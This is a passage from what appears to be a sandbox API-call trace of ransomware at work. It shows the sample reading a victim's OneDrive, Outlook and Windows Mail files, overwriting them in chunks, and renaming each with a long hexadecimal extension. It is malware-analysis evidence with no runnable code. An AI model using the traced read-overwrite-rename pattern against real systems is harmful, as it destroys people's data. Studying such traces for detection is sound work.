CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0160.637] WriteFile (in: hFile=0x594, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0160.802] RtlInterlockedCompareExchange64 () returned 0x5 [0160.802] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0161.033] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x755a4d0, ReturnLength=0x422f7cc) returned 0x0 [0161.034] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll", lpString2=".8E8C4E2C6E7E9549E3160497BA692B1CD5F8427F3A240672CC03EF5B6A596930" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll.8E8C4E2C6E7E9549E3160497BA692B1CD5F8427F3A240672CC03EF5B6A596930") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll.8E8C4E2C6E7E9549E3160497BA692B1CD5F8427F3A240672CC03EF5B6A596930" [0161.035] GetProcessHeap () returned 0x270000 [0161.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16e) returned 0x328130 [0161.035] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x328130, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0161.271] 
CloseHandle (hObject=0x5b8) returned 1 [0161.787] GetProcessHeap () returned 0x270000 [0161.788] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0161.797] RtlInterlockedCompareExchange64 () returned 0x1 [0161.798] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.106] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.106] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.113] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0162.116] RtlInterlockedCompareExchange64 () returned 0x1 [0162.116] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.117] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0162.118] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png", lpString2=".C97C57DA62A8281E67D877B46BDF83D8579C4A28987A1758B5CBDD78CDE7D258" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png.C97C57DA62A8281E67D877B46BDF83D8579C4A28987A1758B5CBDD78CDE7D258") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png.C97C57DA62A8281E67D877B46BDF83D8579C4A28987A1758B5CBDD78CDE7D258" [0162.118] GetProcessHeap () returned 0x270000 [0162.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x328598 [0162.118] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x328598, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0162.120] CloseHandle (hObject=0x594) returned 1 [0162.270] GetProcessHeap () returned 0x270000 [0162.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0162.271] RtlInterlockedCompareExchange64 () returned 0x1 [0162.271] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.526] WriteFile (in: hFile=0x5ac, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.528] RtlInterlockedCompareExchange64 () returned 0x1 [0162.528] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, 
lpOverlapped=0x422f7d0) returned 1 [0162.690] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0162.691] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll", lpString2=".C147FF3E374AA32F5B6B7D17F3ACFB681D73BB1E129B02E26C7382DE427F900E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll.C147FF3E374AA32F5B6B7D17F3ACFB681D73BB1E129B02E26C7382DE427F900E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll.C147FF3E374AA32F5B6B7D17F3ACFB681D73BB1E129B02E26C7382DE427F900E" [0162.692] GetProcessHeap () returned 0x270000 [0162.692] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7420c40 [0162.692] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x7420c40, Length=0x162, FileInformationClass=0xa) returned 0x0 [0162.694] CloseHandle (hObject=0x594) returned 1 [0162.727] GetProcessHeap () returned 0x270000 [0162.728] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0162.728] RtlInterlockedCompareExchange64 () returned 0x2 [0162.728] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.957] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0162.958] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.961] WriteFile (in: hFile=0x5b8, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.972] RtlInterlockedCompareExchange64 () returned 0x2 [0162.972] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.975] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0163.217] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll", lpString2=".992033272E5C21D188AE359B6BFD03EDB7798611D0DB384441A4EDEABA7ED942" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll.992033272E5C21D188AE359B6BFD03EDB7798611D0DB384441A4EDEABA7ED942") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll.992033272E5C21D188AE359B6BFD03EDB7798611D0DB384441A4EDEABA7ED942" [0163.217] GetProcessHeap () returned 0x270000 [0163.217] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x328878 [0163.217] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x328878, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0163.219] CloseHandle (hObject=0x594) returned 1 
[0163.241] GetProcessHeap () returned 0x270000 [0163.243] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0163.243] RtlInterlockedCompareExchange64 () returned 0x2 [0163.243] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.349] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x3a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.349] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.350] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.351] RtlInterlockedCompareExchange64 () returned 0x1 [0163.351] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.358] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.359] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log", 
lpString2=".AE01B803049A4E97A6EC20A9FFC62FDE2038C771046FE1DCEEF10E409F485401" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log.AE01B803049A4E97A6EC20A9FFC62FDE2038C771046FE1DCEEF10E409F485401") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log.AE01B803049A4E97A6EC20A9FFC62FDE2038C771046FE1DCEEF10E409F485401" [0163.359] GetProcessHeap () returned 0x270000 [0163.359] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427b198 [0163.360] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x427b198, Length=0x178, FileInformationClass=0xa) returned 0x0 [0163.361] CloseHandle (hObject=0x5b8) returned 1 [0163.365] GetProcessHeap () returned 0x270000 [0163.367] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.375] RtlInterlockedCompareExchange64 () returned 0x1 [0163.375] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.561] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.562] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.564] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | 
out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.565] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat", lpString2=".C698166EA5557F9D07678CCB6F95A34A462713EA43B26B703477BD2E014E5B76" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat.C698166EA5557F9D07678CCB6F95A34A462713EA43B26B703477BD2E014E5B76") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat.C698166EA5557F9D07678CCB6F95A34A462713EA43B26B703477BD2E014E5B76" [0163.565] GetProcessHeap () returned 0x270000 [0163.565] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4278f60 [0163.565] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x4278f60, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0163.567] CloseHandle (hObject=0x5b8) returned 1 [0163.570] GetProcessHeap () returned 0x270000 [0163.571] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.571] RtlInterlockedCompareExchange64 () returned 0x1 [0163.571] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.578] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.578] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, 
lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.580] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.581] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", lpString2=".391D2D9ECCC99FBBB2486629A2A876A8D1C7A0E0F9D8B2DCCED4ADD9B15C2456" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat.391D2D9ECCC99FBBB2486629A2A876A8D1C7A0E0F9D8B2DCCED4ADD9B15C2456") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat.391D2D9ECCC99FBBB2486629A2A876A8D1C7A0E0F9D8B2DCCED4ADD9B15C2456" [0163.581] GetProcessHeap () returned 0x270000 [0163.581] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4279118 [0163.581] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x4279118, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0163.584] CloseHandle (hObject=0x5b8) returned 1 [0163.587] GetProcessHeap () returned 0x270000 [0163.589] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.589] RtlInterlockedCompareExchange64 () returned 0x1 [0163.589] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.621] ReadFile (in: hFile=0x594, 
lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.622] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.623] WriteFile (in: hFile=0x594, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.624] RtlInterlockedCompareExchange64 () returned 0x0 [0163.625] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.626] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0163.627] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log", lpString2=".22A7C07E782B11B75985FF0E34034D8E12154D1801A6CB191B9B3CDB1037AA19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.22A7C07E782B11B75985FF0E34034D8E12154D1801A6CB191B9B3CDB1037AA19") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.22A7C07E782B11B75985FF0E34034D8E12154D1801A6CB191B9B3CDB1037AA19" [0163.627] GetProcessHeap () returned 0x270000 [0163.627] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x15e) returned 0x3289e0 [0163.627] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x3289e0, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0163.629] CloseHandle (hObject=0x594) returned 1 [0163.669] GetProcessHeap () returned 0x270000 [0163.670] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.670] RtlInterlockedCompareExchange64 () returned 0x1 [0163.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.763] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.764] RtlInterlockedCompareExchange64 () returned 0x0 [0163.764] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.939] ReadFile (in: hFile=0x5b8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0163.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.950] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: 
ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0163.951] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", lpString2=".4ED9DB9169D9BFCBD9137AB221D06D7C2542E79006592DE2F941F32915F53066" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.4ED9DB9169D9BFCBD9137AB221D06D7C2542E79006592DE2F941F32915F53066") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.4ED9DB9169D9BFCBD9137AB221D06D7C2542E79006592DE2F941F32915F53066" [0163.951] GetProcessHeap () returned 0x270000 [0163.951] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x42fb210 [0163.951] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x42fb210, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0163.953] CloseHandle (hObject=0x5b8) returned 1 [0163.954] GetProcessHeap () returned 0x270000 [0163.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0163.957] RtlInterlockedCompareExchange64 () returned 0x1 [0163.957] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.958] WriteFile (in: hFile=0x5b0, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0163.963] RtlInterlockedCompareExchange64 () returned 0x0 [0163.963] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0163.967] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x750a220, ReturnLength=0x422f7cc) returned 0x0 [0163.968] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", lpString2=".941DE0A2A1CD6B34794D1DC30364FF796E5D297647EE63819485A6F06EA11C3A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.941DE0A2A1CD6B34794D1DC30364FF796E5D297647EE63819485A6F06EA11C3A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.941DE0A2A1CD6B34794D1DC30364FF796E5D297647EE63819485A6F06EA11C3A" [0163.968] GetProcessHeap () returned 0x270000 [0163.968] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7421398 [0163.968] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x7421398, Length=0x168, FileInformationClass=0xa) returned 0x0 [0163.971] CloseHandle (hObject=0x5ac) returned 1 [0163.973] GetProcessHeap () returned 0x270000 [0163.975] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0163.981] 